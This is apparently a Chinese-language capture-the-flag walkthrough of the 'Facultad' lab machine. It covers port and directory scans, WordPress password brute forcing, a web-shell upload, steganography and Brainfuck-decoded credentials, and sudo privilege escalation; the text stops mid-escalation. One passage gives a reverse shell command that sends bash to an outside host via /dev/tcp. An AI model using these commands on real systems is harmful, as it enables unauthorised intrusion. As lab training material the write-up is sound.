Facultad

image

信息搜集

192.168.100.57

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
╭─root@LAPTOP-O235O5EH /opt/CVE
╰─# rustscan -a  192.168.100.57                                                                                                                                     2 ↵
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.57:22
Open 192.168.100.57:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-30 16:58 +0800
Initiating ARP Ping Scan at 16:58
Scanning 192.168.100.57 [1 port]
Completed ARP Ping Scan at 16:58, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:58
Completed Parallel DNS resolution of 1 host. at 16:58, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 16:58
Scanning 192.168.100.57 [2 ports]
Discovered open port 22/tcp on 192.168.100.57
Discovered open port 80/tcp on 192.168.100.57
Completed SYN Stealth Scan at 16:58, 0.01s elapsed (2 total ports)
Nmap scan report for 192.168.100.57
Host is up, received arp-response (0.00068s latency).
Scanned at 2026-03-30 16:58:38 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:A9:9E:C0 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

枚举

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
─root@LAPTOP-O235O5EH /opt/CVE
╰─# gobuster dir -u http://192.168.100.57/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.57/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              zip,db,bak,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 4651]
images               (Status: 301) [Size: 317] [--> http://192.168.100.57/images/]
education            (Status: 301) [Size: 320] [--> http://192.168.100.57/education/]
server-status        (Status: 403) [Size: 279]
Progress: 1543906 / 1543906 (100.00%)
===============================================================
Finished
===============================================================

/education是一个wp搭建的网站

image

需要写入hosts

1
192.168.100.57 facultad.thl

WPScan

枚举wp用户名和漏洞插件

1
wpscan --url http://192.168.100.57/education/ --enumerate u,vp

image

facultad

爆破用户密码

1
wpscan --url http://192.168.100.57/education/ --passwords /usr/share/wordlists/rockyou.txt --usernames facultad

image

facultad:asdfghjkl

http://facultad.thl/education/wp-login.php登录到后台

image

image

可以上传文件

image

image

反弹shell

1
?cmd=bash -c 'exec bash -i %26>/dev/tcp/192.168.100.46/8888 <%261'

image

提权

www -> vivian

/var/www/html/images/里面有一个图片get下来分析一下

这里使用的是随波逐流的steghide

image

Hola Gabri,
se me ha olvidado la contraseña creo que te la pasé y la tienes en tu correo.
Vivian

提示密码在邮件里

/var/mail/gabri/.password_vivian.bf

image

是一个brainfuck的编码

在线网站解码 https://ctfever.uniiem.com/tools/brain-fuck

image

登录凭证 vivian:lapatrona2025

vivian -> root

1
2
3
4
5
6
7
$ sudo -l
sudo: unable to resolve host TheHackersLabs-facultad.thl: Nombre o servicio desconocido
Matching Defaults entries for vivian on TheHackersLabs-facultad:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User vivian may run the following commands on TheHackersLabs-facultad:
    (ALL) NOPASSWD: /opt/vivian/script.sh

可以使用script.sh进行提权

1
2
3
$ cat /opt/vivian/script.sh
#!/bin/bash
echo "Ejecutado como vivian para mis alumnos"

因为脚本的所属用户和组都是vivian的且可以以root运行

image